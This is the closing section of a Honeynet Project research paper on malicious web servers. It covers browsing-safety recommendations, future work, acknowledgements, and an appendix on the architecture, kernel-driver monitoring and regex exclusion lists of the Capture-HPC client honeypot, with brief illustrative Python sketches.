When choosing a search engine to access sites, ensure that you use one that assesses the safety of the sites in its index. Google, for instance, displays warning messages on the search results page next to sites that are not safe. While Google's internal blacklist is probably not complete either, it provides another protection layer that might prevent a successful compromise of the machine you are using.

Finally, we make a recommendation on the software to use. Attackers are criminals that would like to attack as many people as possible in order to get the largest return on their investment. As such, they target popular, homogeneous systems. The tests we conducted show that a simple but effective way to remove yourself as a targeted user is to use a non-mainstream application, such as Opera. As mentioned above, despite the existence of vulnerabilities, this browser didn't seem to be a target.

We have just listed a few recommendations that would allow you to reduce the risk of falling victim to an attack by a malicious web server. Implementing such measures does not guarantee full protection, but it does lower the risk. One should practice security in breadth and depth and there are additional measures one can take that are beyond the scope of this paper, such as measures that would detect a successful compromise. To best secure your operating system and browser we suggest contacting your vendor directly for specific instructions on configuration or patching against client-side attacks. You can reference our paper directly with them and inquire as to their specific instructions for mitigating these types of attacks with their software.

The data that we have generated and collected that we reference in this study is available for download from our web site at http://www.nz-honeynet.org/kye/mws/complete_data_set.zip.

FUTURE WORK

In this paper, we have identified malicious web servers with our high interaction client honeypot Capture-HPC. As part of future work, we would like to identify malicious web servers with our low interaction client honeypot HoneyC and compare the results. We suspect that this comparison will give us insights into the detection accuracy, in particular false negatives, of each client honeypot technology.

Further, we would like to expand our research to client-side attacks that target browser plug-ins as well as non-browser client applications. The data we have collected as part of this study already shows that browser plug-ins, such as QuickTime and Winzip, are targeted. A closer look at browser plug-ins will allow us to assess the magnitude of the problem. In addition to browser plug-ins, we would like to evaluate the risk to non-browser applications, such as Microsoft Office, Adobe Acrobat Reader, etc. Many remote execution vulnerabilities have been publicly disclosed for these client applications and it is suspected that they are also targeted. Our future research will determine the extent of the threat.

In addition, time-sensitive behavior was not addressed extensively by our study. While we observed that malicious URLs tend to stop exhibiting malicious behavior after some time has passed, a representative model of the disappearance and appearance would be necessary in order to assess growth rates of client-side attacks. A trend analysis would be required. Along these lines, we would also like to assess how quickly new exploits appear on the Internet. Interesting time factors to consider are the disclosure of the vulnerability, public availability of the exploit and the availability of the patch.

ACKNOWLEDGEMENTS

We would like to thank the following people:

Anton Chuvakin of the Honeynet Project
David Watson of the UK Honeynet Project (reviewer)
Hugo Francisco González Robledo of the Mexican Honeynet Project (reviewer)
Jamie Riden of the UK Honeynet Project (reviewer)
Ian Welch of Victoria University of Wellington (reviewer)
Javier Fernández-Sanguino of the Spanish Honeynet Project (reviewer)
Jeff L. Stutzman of the Honeynet Project (reviewer)
Markus Koetter of the German Honeynet Project (reviewer)
Mark Davies and team of Victoria University of Wellington for providing us with the network infrastructure and support.
Nicolas Fischbach of the Honeynet Project
Niels Provos of the Honeynet Project (reviewer)
Pedro Inacio of the Portuguese Honeynet Project (reviewer)
Peter Komisarczuk of Victoria University of Wellington (reviewer)
Ralph Logan of the Honeynet Project (reviewer)
Roger Carlsen of the Norwegian Honeynet Project (reviewer)
Ryan McGeehan of the Chicago Honeynet Project (reviewer)

Appendix A

ABOUT CAPTURE-HPC

Capture-HPC is a high interaction client honeypot developed at Victoria University of Wellington in conjunction with the New Zealand Honeynet Project. In this section, we describe the tool in more detail. We cover the general functionality and the underlying architecture and technical aspects.

Functionality

Capture-HPC finds malicious servers on a network. It does so by driving a vulnerable browser to interact with a list of potentially malicious servers. If any unauthorized state changes are detected, Capture-HPC classifies the last server it interacted with as malicious. Capture is capable of monitoring various aspects of the operating system: the file system, registry, and processes that are running. Since some events occur during normal operation (e.g. writing files to the web browser cache), exclusion lists allow certain types of events to be ignored.

Architecture

Figure 18 - Capture-HPC Architecture

Capture-HPC is split into two areas as shown in Figure 18: a Capture Server and Capture Client. The primary purpose of the Capture Server is to control numerous Capture Clients that can be installed on multiple VMware servers and multiple guest instances. The Capture Server can start and stop clients, instruct clients to interact with a web server retrieving a specified URI, and aggregate the classifications the Capture Clients make of the web servers they have interacted with. The Capture Clients actually perform the work. They accept the commands of the server to start and stop themselves and to visit a web server with a browser of choice. As a Capture Client interacts with a web server, it monitors its state for unauthorized state changes and sends this information back to the Capture Server. If the classification is malicious, the Capture Server resets the guest instance to a clean state before instructing the Capture Client to interact with the next server.
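The visit, classify and reset cycle described above can be sketched as a short control loop. This is a simulation under stated assumptions rather than Capture-HPC's actual code (the server is written in Java): FakeClient, visit, revert_to_clean_state and run are hypothetical names, and the "state change" is faked with a set lookup.

```python
class FakeClient:
    """Stand-in for a Capture Client running in a VM guest (hypothetical)."""

    def __init__(self, malicious_urls):
        self.malicious_urls = set(malicious_urls)
        self.reverts = 0

    def visit(self, url):
        # True means an unauthorized state change was observed during the visit.
        return url in self.malicious_urls

    def revert_to_clean_state(self):
        # A real server would ask VMware to restore a clean snapshot here.
        self.reverts += 1

def run(client, urls):
    """Visit each URL in turn; reset the guest only after a malicious visit."""
    classifications = {}
    for url in urls:
        malicious = client.visit(url)
        classifications[url] = "malicious" if malicious else "benign"
        if malicious:
            client.revert_to_clean_state()
    return classifications

client = FakeClient(malicious_urls={"http://bad.invalid/"})
print(run(client, ["http://good.invalid/", "http://bad.invalid/"]))
print("reverts:", client.reverts)
```

Resetting only after a malicious classification keeps the costly snapshot restore off the common path, since most visited URLs are benign.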

Technical Description

The Capture Server is a simple TCP/IP server that manages several Capture Clients and the VMware servers that host the guest OS instances that run the Capture Clients. The Capture Server takes each URL it receives and distributes it to the available clients in a round-robin fashion. Upon startup, the server listens on port 7070 for clients that connect to it. The Capture Server is written in Java and controls the VMware servers using the VMware C API, which it wraps using JNI.
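Round-robin distribution simply hands each new URL to the next client in a fixed rotation. A minimal sketch, assuming clients are identified by name (the actual server is written in Java and its data structures are not described here; distribute and the client names are hypothetical):

```python
from itertools import cycle

def distribute(urls, clients):
    """Assign URLs to clients in rotation and return {client: [urls...]}."""
    assignment = {client: [] for client in clients}
    for url, client in zip(urls, cycle(clients)):
        assignment[client].append(url)
    return assignment

plan = distribute(["u1", "u2", "u3", "u4", "u5"], ["client-a", "client-b"])
print(plan)
```

With five URLs and two clients, the first client receives the odd-numbered URLs and the second the even-numbered ones.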

Figure 19 - Capture Client

The Capture Client in turn consists of two components, a set of kernel drivers and a user space process, as shown in Figure 19. The kernel drivers operate in kernel space and use event-based detection mechanisms for monitoring the system's state changes. The user space process, which accepts visitation requests from the Capture Server, drives the client to interact with the server and communicates the state changes back to the server via a simple TCP/IP connection. The user space process captures the state changes from the kernel drivers and filters the events based on the exclusion lists. Each component is written in unmanaged C code.

Kernel Drivers

The Capture Client uses kernel drivers to monitor the system through the kernel's existing callback mechanism, which notifies registered drivers when a certain event happens. These callbacks invoke functions inside a kernel driver and pass the actual event information so that it can either be modified or, in Capture's case, monitored. The following callback functions are registered by Capture:

CmRegisterCallback
PsSetCreateProcessNotifyRoutine
FilterLoad, FltRegisterFilter

When events are received inside the Capture kernel drivers, they are queued waiting to be sent to the user space component of the tool. This is accomplished by passing a user allocated buffer from user space into kernel space where the kernel drivers then copy information into that buffer, so the application can process it in user space.

User Space Process

The user space process is an application that resides in user space. It is the entry point of the Capture application. It is responsible for loading the drivers, processing the events received from the drivers and writing the events to the log.

As mentioned above, the user space application, once it has loaded the drivers, creates a buffer and passes it from user space to the kernel drivers. Passing of the buffer occurs via the Win32 API and the IO Manager. The kernel drivers copy the event data into the buffer, so the user level application can process the events. Each event is serialized and compared against the entries in the exclusion list. The exclusion lists are built using regular expressions, which means event exclusions can be grouped into one line. This functionality is provided by the Boost::regex library. For each monitor, an exclusion list is parsed and an internal mapping between event types and allowed regular expressions is created. If a received event is included in the list, the event is dropped; otherwise, it is output to the final report that Capture generates.
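The exclusion-list filtering can be illustrated with a small sketch. Capture itself does this in C with Boost::regex; the Python below only mirrors the idea, and the event format, the sample pattern, and the names EXCLUSIONS, is_excluded and filter_events are assumptions, not the tool's actual exclusion-list syntax.

```python
import re

# Hypothetical per-monitor exclusion lists: one regular expression can cover
# a whole family of benign events, such as writes to the browser cache.
EXCLUSIONS = {
    "file": [re.compile(r".*\\Temporary Internet Files\\.*", re.IGNORECASE)],
    "process": [],
    "registry": [],
}

def is_excluded(monitor, event_text):
    """True if the serialized event matches any exclusion for its monitor."""
    return any(p.fullmatch(event_text) for p in EXCLUSIONS.get(monitor, []))

def filter_events(events):
    """Drop excluded events; everything else goes to the report."""
    return [(m, text) for m, text in events if not is_excluded(m, text)]

events = [
    ("file", r"Write C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\a.gif"),
    ("file", r"Write C:\WINDOWS\benupd32.exe"),
    ("process", r"Created C:\WINDOWS\benupd32.exe"),
]
for monitor, text in filter_events(events):
    print(monitor, text)
```

Only the cache write is dropped; the write to the Windows directory and the process creation remain in the report and would lead to a malicious classification.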

About The Capture-HPC Project

The project is led by Ramon Steenson and Christian Seifert. The tool is open source (released under the GNU General Public License) and available from our web site at http://www.nz-honeynet.org/capture.html. Installation of the tool requires a Linux or Windows machine capable of running VMware Server and at least one virtual machine with Microsoft Windows. Support is available through the public Honeynet Project Capture-HPC support mailing list. The project is also looking for contributors. Please refer to the Capture-HPC web site for more information.

ABOUT THE AUTHORS

Christian Seifert is a PhD candidate at Victoria University of Wellington, New Zealand and is currently on a visiting scholar appointment at the University of Washington in Seattle, WA. His research is targeted at improving the detection accuracy and speed of client honeypots. Christian has an MS in Software Engineering with a focus on computer security from Seattle University, WA. Christian has been a member of the New Zealand Honeynet Project since April 2006.

Ramon Steenson is a software engineer working as a research assistant at Victoria University of Wellington, New Zealand and a member of the New Zealand Honeynet Project. He has a Bachelor of Information Technology from that university. His interests include honeypot technologies, computer security, and kernel development.

Thorsten Holz is a Ph.D. student at the Laboratory for Dependable Distributed Systems at the University of Mannheim, Germany. He is one of the founders of the German Honeynet Project and a member of the Steering Committee of the Honeynet Research Alliance. He regularly blogs at http://honeyblog.org

Bing Yuan is a student at RWTH Aachen in Germany and a member of the German Honeynet Organization. He is responsible for one client-side honeypot project (the CHP system), on which he wrote his master's thesis. He is interested in researching vulnerabilities of client-side software and client-side exploits using client-side honeypots.

Michael A. Davis is CEO of Savid Technologies, Inc., a security and technology consulting firm in Chicago. He is an active developer and deployer of intrusion detection systems, with contributions to the Snort Intrusion Detection System. Michael is also a member of the Honeynet Project, where he is working to develop data and network control mechanisms for Windows-based honeynets. Michael has worked with McAfee, Inc., a leader in anti-virus protection and vulnerability management, as Senior Manager of Global Threats, where he led a team of researchers investigating confidential and cutting-edge security research. Michael has also worked for companies such as 3com and managed two Internet Service Providers. Lastly, Michael is an active developer in the Open Source community and has ported many popular network security applications to the Windows platform, including Snort and Honeyd. Currently, Michael is a contributing author to Hacking Exposed, the number one book on hacker methodology.
